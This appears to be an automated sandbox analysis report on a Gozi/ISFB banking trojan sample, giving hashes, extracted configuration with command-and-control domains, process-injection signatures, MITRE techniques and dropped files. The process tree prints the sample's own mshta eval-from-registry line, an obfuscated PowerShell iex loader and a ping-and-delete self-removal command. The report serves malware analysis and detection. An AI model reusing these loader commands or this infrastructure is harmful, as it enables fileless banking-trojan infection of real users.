gozi | 27a54ac6664ee9e26e6f662339f26a604ea919441b610ac06dd03288eaac7b96

Analysis

max time kernel
150s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
06-10-2023 09:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9be542d7066e3923dced6d6eef402197.exe
Size

293KB
MD5

9be542d7066e3923dced6d6eef402197
SHA1

d3328ad369fd13bd525e9aad8a45e0f340865305
SHA256

27a54ac6664ee9e26e6f662339f26a604ea919441b610ac06dd03288eaac7b96
SHA512

d66ff4090f255302a093ffc4bbbbc6cd9ba8f3cb8aaf1d708cea0a76a2a696899e31cb1cb8f164b55df283a8d42004c50a2226e526548815cff8e0773cb9035a
SSDEEP

3072:QHgkbYK7vhDaEcb3b0LEyMZZAqKjYA+fvrRmso7HHZzBd1zot:+5Y8vhr+3ILEyM9KcA8rRm/H7zo

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

mifrutty.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

mifrutty.com

systemcheck.top

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

mshta.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation mshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation	mshta.exe

Suspicious use of SetThreadContext 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 4308 set thread context of 3252	4308	powershell.exe	Explorer.EXE
PID 3252 set thread context of 3756	3252	Explorer.EXE	RuntimeBroker.exe
PID 3252 set thread context of 4016	3252	Explorer.EXE	RuntimeBroker.exe
PID 3252 set thread context of 4968	3252	Explorer.EXE	RuntimeBroker.exe
PID 3252 set thread context of 3820	3252	Explorer.EXE	RuntimeBroker.exe
PID 3252 set thread context of 3724	3252	Explorer.EXE	cmd.exe
PID 3252 set thread context of 2472	3252	Explorer.EXE	cmd.exe
PID 3724 set thread context of 4424	3724	cmd.exe	PING.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2900 2284 WerFault.exe 9be542d7066e3923dced6d6eef402197.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4424 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

4424 PING.EXE

pid	pid_target	process	target process
2900	2284	WerFault.exe	9be542d7066e3923dced6d6eef402197.exe

pid	process
4424	PING.EXE

pid	process
4424	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

9be542d7066e3923dced6d6eef402197.exepowershell.exeExplorer.EXE

pid	process
2284	9be542d7066e3923dced6d6eef402197.exe
2284	9be542d7066e3923dced6d6eef402197.exe
4308	powershell.exe
4308	powershell.exe
4308	powershell.exe
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3252 Explorer.EXE
Suspicious behavior: MapViewOfSection 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

4308 powershell.exe
3252 Explorer.EXE
3252 Explorer.EXE
3252 Explorer.EXE
3252 Explorer.EXE
3252 Explorer.EXE
3252 Explorer.EXE
3724 cmd.exe

pid	process
3252	Explorer.EXE

pid	process
4308	powershell.exe
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3252	Explorer.EXE
3724	cmd.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

powershell.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	4308	powershell.exe
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE
Token: SeShutdownPrivilege	3252	Explorer.EXE
Token: SeCreatePagefilePrivilege	3252	Explorer.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

3252 Explorer.EXE
Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid process

3252 Explorer.EXE

pid	process
3252	Explorer.EXE

pid	process
3252	Explorer.EXE

Suspicious use of WriteProcessMemory 46 IoCs

Processes:

mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 1568 wrote to memory of 4308	1568	mshta.exe	powershell.exe
PID 1568 wrote to memory of 4308	1568	mshta.exe	powershell.exe
PID 4308 wrote to memory of 2280	4308	powershell.exe	csc.exe
PID 4308 wrote to memory of 2280	4308	powershell.exe	csc.exe
PID 2280 wrote to memory of 884	2280	csc.exe	cvtres.exe
PID 2280 wrote to memory of 884	2280	csc.exe	cvtres.exe
PID 4308 wrote to memory of 1324	4308	powershell.exe	csc.exe
PID 4308 wrote to memory of 1324	4308	powershell.exe	csc.exe
PID 1324 wrote to memory of 4364	1324	csc.exe	cvtres.exe
PID 1324 wrote to memory of 4364	1324	csc.exe	cvtres.exe
PID 4308 wrote to memory of 3252	4308	powershell.exe	Explorer.EXE
PID 4308 wrote to memory of 3252	4308	powershell.exe	Explorer.EXE
PID 4308 wrote to memory of 3252	4308	powershell.exe	Explorer.EXE
PID 4308 wrote to memory of 3252	4308	powershell.exe	Explorer.EXE
PID 3252 wrote to memory of 3756	3252	Explorer.EXE	RuntimeBroker.exe
PID 3252 wrote to memory of 3756	3252	Explorer.EXE	RuntimeBroker.exe
PID 3252 wrote to memory of 3756	3252	Explorer.EXE	RuntimeBroker.exe
PID 3252 wrote to memory of 3756	3252	Explorer.EXE	RuntimeBroker.exe
PID 3252 wrote to memory of 4016	3252	Explorer.EXE	RuntimeBroker.exe
PID 3252 wrote to memory of 4016	3252	Explorer.EXE	RuntimeBroker.exe
PID 3252 wrote to memory of 4016	3252	Explorer.EXE	RuntimeBroker.exe
PID 3252 wrote to memory of 4016	3252	Explorer.EXE	RuntimeBroker.exe
PID 3252 wrote to memory of 4968	3252	Explorer.EXE	RuntimeBroker.exe
PID 3252 wrote to memory of 4968	3252	Explorer.EXE	RuntimeBroker.exe
PID 3252 wrote to memory of 4968	3252	Explorer.EXE	RuntimeBroker.exe
PID 3252 wrote to memory of 4968	3252	Explorer.EXE	RuntimeBroker.exe
PID 3252 wrote to memory of 3820	3252	Explorer.EXE	RuntimeBroker.exe
PID 3252 wrote to memory of 3820	3252	Explorer.EXE	RuntimeBroker.exe
PID 3252 wrote to memory of 3820	3252	Explorer.EXE	RuntimeBroker.exe
PID 3252 wrote to memory of 3820	3252	Explorer.EXE	RuntimeBroker.exe
PID 3252 wrote to memory of 3724	3252	Explorer.EXE	cmd.exe
PID 3252 wrote to memory of 3724	3252	Explorer.EXE	cmd.exe
PID 3252 wrote to memory of 3724	3252	Explorer.EXE	cmd.exe
PID 3252 wrote to memory of 2472	3252	Explorer.EXE	cmd.exe
PID 3252 wrote to memory of 2472	3252	Explorer.EXE	cmd.exe
PID 3252 wrote to memory of 2472	3252	Explorer.EXE	cmd.exe
PID 3252 wrote to memory of 2472	3252	Explorer.EXE	cmd.exe
PID 3252 wrote to memory of 3724	3252	Explorer.EXE	cmd.exe
PID 3252 wrote to memory of 3724	3252	Explorer.EXE	cmd.exe
PID 3252 wrote to memory of 2472	3252	Explorer.EXE	cmd.exe
PID 3252 wrote to memory of 2472	3252	Explorer.EXE	cmd.exe
PID 3724 wrote to memory of 4424	3724	cmd.exe	PING.EXE
PID 3724 wrote to memory of 4424	3724	cmd.exe	PING.EXE
PID 3724 wrote to memory of 4424	3724	cmd.exe	PING.EXE
PID 3724 wrote to memory of 4424	3724	cmd.exe	PING.EXE
PID 3724 wrote to memory of 4424	3724	cmd.exe	PING.EXE

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3756

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3252

C:\Users\Admin\AppData\Local\Temp\9be542d7066e3923dced6d6eef402197.exe
"C:\Users\Admin\AppData\Local\Temp\9be542d7066e3923dced6d6eef402197.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 1380
3⤵
- Program crash
PID:2900

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ea2h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ea2h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\304F83E1-CF18-E2AF-D964-73361DD857CA\\\OperatorAbout'));if(!window.flag)close()</script>"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pusgweamo -value gp; new-alias -name nqcxepehe -value iex; nqcxepehe ([System.Text.Encoding]::ASCII.GetString((pusgweamo "HKCU:Software\AppDataLow\Software\Microsoft\304F83E1-CF18-E2AF-D964-73361DD857CA").ClassDocument))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4308

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qspxssyr\qspxssyr.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2280

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFD1D.tmp" "c:\Users\Admin\AppData\Local\Temp\qspxssyr\CSCFBAF0F1498B04118954820546577D65.TMP"
5⤵
PID:884

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\r1mk040f\r1mk040f.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1324

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFDE8.tmp" "c:\Users\Admin\AppData\Local\Temp\r1mk040f\CSC675ABC8928FC4580A7CDDE8E73D679BD.TMP"
5⤵
PID:4364

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\9be542d7066e3923dced6d6eef402197.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3724

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:4424

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:2472

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4968

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4016

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2284 -ip 2284
1⤵
PID:3288

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESFD1D.tmp

Filesize
1KB

MD5
a2e9046dbfd0b475d03121c98f03c064

SHA1
d97768a09d63d7a57ada47fe8cd7155a95dcdade

SHA256
e946da0e740c677953820b5a95b7457915fed1b079b9fce200d01c727c655b4d

SHA512
26cf6682e4dad4fac7553ce09cf36675fea888366e60b1010736fef488338e15cbf46d4c8ec299eeab00d6f66d516b871ac35ceb4a08aa3966d2a04319772cba

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESFDE8.tmp

Filesize
1KB

MD5
84e5bcd39bcd45e72de39b3fe2392bf0

SHA1
48afcee41306372b8faace0a91fd002d3866fdbd

SHA256
b9a4818cde67f9ca3b1f56b2d35414e1a49f2f48ebe6634815b5161bfbe8e247

SHA512
bba9e496ea591bc2f955c4d44014fa5a6d487d5e2135135fd277e8e4319b23a0a9985cdb6178a18e8ee36b9f8644bce0f4ecb84bcff0c70f8ed2d7e0fb877684

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dqu2qo41.40l.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\qspxssyr\qspxssyr.dll

Filesize
3KB

MD5
203cda507c6efa83019d52eaf53654b1

SHA1
48cfcf7c11b086668bcb37bb325d885be565769d

SHA256
796b2b34d05f5388616e90fa5032981950f0d0be51f7f7c06b6f281202a16464

SHA512
83fc972397e46981ad0a8e5dcb9b17b739a0a239b9498f1c96d459062259cc023c862ab70eb26bdd12bee05f564cf550a0695e125cdc91e7d49bacf821002841

Download Submit
C:\Users\Admin\AppData\Local\Temp\r1mk040f\r1mk040f.dll

Filesize
3KB

MD5
7acf9a210cca055cf241014b7f1bf84b

SHA1
ebf52f3082029d0b3a5823ed2ef8d76686fca7d8

SHA256
47e3ad012307947268eff943e26bf3f2a47ee6a327bd77473f2d72cf2dccaf62

SHA512
e1cddc8c0282cde832ca0b8096a538180b6af9bec466824bd144b977ae08b74aa420a2bfda178d26d41acc1b26821405ae337cfd5a6092ea89d4e14c46dd5f60

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qspxssyr\CSCFBAF0F1498B04118954820546577D65.TMP

Filesize
652B

MD5
a84df5c9dced23e662ee74a58a7c9f25

SHA1
bd34d15cd98dc48b6cc47f9683495ddae7e837a9

SHA256
f8e0d6d314f91191ace12fa6bbf3bc8a0b2d7ae2abb75c1188c96cbb8303ea54

SHA512
964c2bbe41dcbba912c1d3fc9cdbd9ab484dddcd22846d095f311a265e08743e0993158e9455e50bc23733e2cf1030fa11b8fe6f4c979c6104ed2ad0d03f2038

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qspxssyr\qspxssyr.0.cs

Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qspxssyr\qspxssyr.cmdline

Filesize
369B

MD5
ed95f7a24a6d28a0ddc7955e51713d4c

SHA1
c2f60c89e40d1c2c8aad3759fb18da0acf145ec0

SHA256
326273f6bf020a032ffdd3be8ea56dd7959e5c70c0c198a4b16ed6857ce7432e

SHA512
7ae984d0647023e4d321cd45df39a3743ea3dacc5a358380f6f5f2025e203e665d9ead980f6593744ce8a03a4472084b5997ea612e64158f76e7d61596982a2f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\r1mk040f\CSC675ABC8928FC4580A7CDDE8E73D679BD.TMP

Filesize
652B

MD5
a54183ecd6561c257a349614b9ddd265

SHA1
ea1ed9d1a59c050e0ed10640cd33410ab108b298

SHA256
2d67cefdd984d06c93e3ad690c592f15c2c7d12f4fc2471e92a0dc197afafa31

SHA512
10b48121cc39e9d9af0d391936cbdb1304f554b013b09c3e43d9709426038b77454a734bf4ce5e404276e5159553e464f62d88b7a0ec467618c9caa4f11def61

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\r1mk040f\r1mk040f.0.cs

Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\r1mk040f\r1mk040f.cmdline

Filesize
369B

MD5
59c0c5c6d72ecce3258e6d25f9d2f98f

SHA1
69d54af9668faba49a93fc50cb22798abb3be479

SHA256
4ac1ec8f9a0f7f478d870e410c344153d97a84653fd07da035c2111210c4d81b

SHA512
0de26b92c3a512d70bb131c867948bdc8c9774b0d7814cebabd7572d61705a2cf6b2bd642008b061037f56e16bd422e9c9f89f6f4eb996a74df1ea74da4268e1

Download Submit
memory/2284-7-0x0000000002490000-0x000000000249D000-memory.dmp

Filesize
52KB

Download
memory/2284-4-0x0000000002430000-0x000000000243B000-memory.dmp

Filesize
44KB

Download
memory/2284-1-0x00000000024D0000-0x00000000025D0000-memory.dmp

Filesize
1024KB

Download
memory/2284-2-0x0000000002430000-0x000000000243B000-memory.dmp

Filesize
44KB

Download
memory/2284-3-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/2284-118-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/2284-10-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/2284-6-0x00000000024D0000-0x00000000025D0000-memory.dmp

Filesize
1024KB

Download
memory/2284-5-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/2472-98-0x0000000000DD0000-0x0000000000E68000-memory.dmp

Filesize
608KB

Download
memory/2472-105-0x0000000000DD0000-0x0000000000E68000-memory.dmp

Filesize
608KB

Download
memory/3252-58-0x0000000000FA0000-0x0000000000FA1000-memory.dmp

Filesize
4KB

Download
memory/3252-103-0x0000000008F60000-0x0000000009004000-memory.dmp

Filesize
656KB

Download
memory/3252-57-0x0000000008F60000-0x0000000009004000-memory.dmp

Filesize
656KB

Download
memory/3724-95-0x000001E47B7E0000-0x000001E47B884000-memory.dmp

Filesize
656KB

Download
memory/3724-117-0x000001E47B7E0000-0x000001E47B884000-memory.dmp

Filesize
656KB

Download
memory/3724-106-0x000001E47B7E0000-0x000001E47B884000-memory.dmp

Filesize
656KB

Download
memory/3724-104-0x000001E47B6C0000-0x000001E47B6C1000-memory.dmp

Filesize
4KB

Download
memory/3756-109-0x000001A69E040000-0x000001A69E0E4000-memory.dmp

Filesize
656KB

Download
memory/3756-71-0x000001A69DBE0000-0x000001A69DBE1000-memory.dmp

Filesize
4KB

Download
memory/3756-70-0x000001A69E040000-0x000001A69E0E4000-memory.dmp

Filesize
656KB

Download
memory/3820-89-0x000001B7405F0000-0x000001B7405F1000-memory.dmp

Filesize
4KB

Download
memory/3820-119-0x000001B741340000-0x000001B7413E4000-memory.dmp

Filesize
656KB

Download
memory/3820-88-0x000001B741340000-0x000001B7413E4000-memory.dmp

Filesize
656KB

Download
memory/4016-114-0x0000021FB3290000-0x0000021FB3334000-memory.dmp

Filesize
656KB

Download
memory/4016-76-0x0000021FB3290000-0x0000021FB3334000-memory.dmp

Filesize
656KB

Download
memory/4016-77-0x0000021FB28D0000-0x0000021FB28D1000-memory.dmp

Filesize
4KB

Download
memory/4308-25-0x000001A720640000-0x000001A720650000-memory.dmp

Filesize
64KB

Download
memory/4308-68-0x000001A738DD0000-0x000001A738E0D000-memory.dmp

Filesize
244KB

Download
memory/4308-55-0x000001A738DD0000-0x000001A738E0D000-memory.dmp

Filesize
244KB

Download
memory/4308-24-0x000001A720640000-0x000001A720650000-memory.dmp

Filesize
64KB

Download
memory/4308-53-0x000001A738B80000-0x000001A738B88000-memory.dmp

Filesize
32KB

Download
memory/4308-13-0x000001A738A30000-0x000001A738A52000-memory.dmp

Filesize
136KB

Download
memory/4308-23-0x00007FFD714C0000-0x00007FFD71F81000-memory.dmp

Filesize
10.8MB

Download
memory/4308-67-0x00007FFD714C0000-0x00007FFD71F81000-memory.dmp

Filesize
10.8MB

Download
memory/4308-39-0x000001A738B60000-0x000001A738B68000-memory.dmp

Filesize
32KB

Download
memory/4308-26-0x000001A720640000-0x000001A720650000-memory.dmp

Filesize
64KB

Download
memory/4424-111-0x000002BB116E0000-0x000002BB116E1000-memory.dmp

Filesize
4KB

Download
memory/4424-116-0x000002BB118D0000-0x000002BB11974000-memory.dmp

Filesize
656KB

Download
memory/4424-108-0x000002BB118D0000-0x000002BB11974000-memory.dmp

Filesize
656KB

Download
memory/4968-115-0x0000013492A90000-0x0000013492B34000-memory.dmp

Filesize
656KB

Download
memory/4968-82-0x0000013492A90000-0x0000013492B34000-memory.dmp

Filesize
656KB

Download
memory/4968-83-0x0000013492870000-0x0000013492871000-memory.dmp

Filesize
4KB

Download